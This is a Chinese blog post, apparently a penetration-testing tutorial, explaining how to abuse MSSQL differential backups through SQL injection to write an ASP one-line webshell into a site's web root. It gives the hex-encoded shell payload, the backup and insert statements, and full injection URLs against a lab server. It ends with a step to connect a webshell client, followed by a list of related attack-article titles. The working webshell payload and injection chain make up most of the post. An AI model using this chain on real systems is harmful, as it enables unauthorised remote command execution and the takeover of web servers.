Web渗透之mssql差异备份getshell
2019-05-23 10:06
2667 查看
版权声明: https://blog.csdn.net/qq_17204441/article/details/90509840
Web渗透之mssql差异备份getshell
简介
差异备份数据库得到webshell。在sql server 里dbo和sa权限都有备份数据库权限,我们可以把数据库备份称asp文件,这样我们就可以通过mssqlserver的备份数据库功能生成一个网页小马。
差异备份的流程大概这样:
1.完整备份一次(保存位置当然可以改)
[code]backup database 库名 to disk = 'c:\ddd.bak';--
2.创建表并插入数据
[code]create table [dbo].[dtest] ([cmd] [image]);-- insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--
3.进行差异备份
[code]backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
上面
[code]0x3C25657865637574652872657175657374282261222929253E
[code]就是一句话木马的内容:<%execute(request("a"))%>
例子
测试例子中我目标网站的绝对路径是E:\wwwroot\asp_sqli,数据库名是asp_test
1、
[code]http://192.168.5.21:81/index.asp?id=1;backup%20database%20asp_test%20to%20disk%20=%27E:\wwwroot\asp_sqli\ddd.bak%27;--
2、
[code]http://192.168.5.21:81/index.asp?id=1;create%20table%20[dbo].[dtest]%20([cmd][image]);--
[code]http://192.168.5.21:81/index.asp?id=1;insert%20into%20dtest(cmd)values(0x3C25657865637574652872657175657374282261222929253E);--
3、
[code]http://192.168.5.21:81/index.asp?id=1;backup%20database%20asp_test%20to%20disk=%27E:\wwwroot\asp_sqli\d.asp%27%20WITH%20DIFFERENTIAL,FORMAT;--
菜刀连接d.asp即可。
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- Web渗透之mssql2005 差异备份getshell
- MSSQL2005差异备份拿shell (MSSQL2005 Backup Get Shell)
- MSSQL2005差异备份拿shell (MSSQL2005 Backup Get Shell)
- MSSQL2005差异备份拿shell (MSSQL2005 Backup Get Shell)
- MSSQL差异备份拿shell(转)
- mssql差异备份拿shell
- MSsql差异备份总结
- 一次差异备份拿shell过程
- eWebEditor getwebshell
- 完全备份数据和差异备份数据的shell脚本
- MSSQL差异备份取系统权限的相关软件下载
- centos6.5环境通过shell脚本备份php的web及mysql数据库并做远程备份容灾
- mssql差异备份获得的webshell的个人体会
- centos6.5环境通过shell脚本备份php的web及mysql数据库并做远程备份容灾
- 提权思路之MSSQL差异备份取系统权限
- MSSQL注入时的手工差异备份与提权
- MSSQL注入时的手工差异备份与提权 ___and___ 巧用差异备份DB_OWNER提权
- 渗透必备:linux下备份拿shell
- PJBlog 3.2.9.518 getwebshell 漏洞
- Oblog 4.5-4.6 access&mssql getshell 0day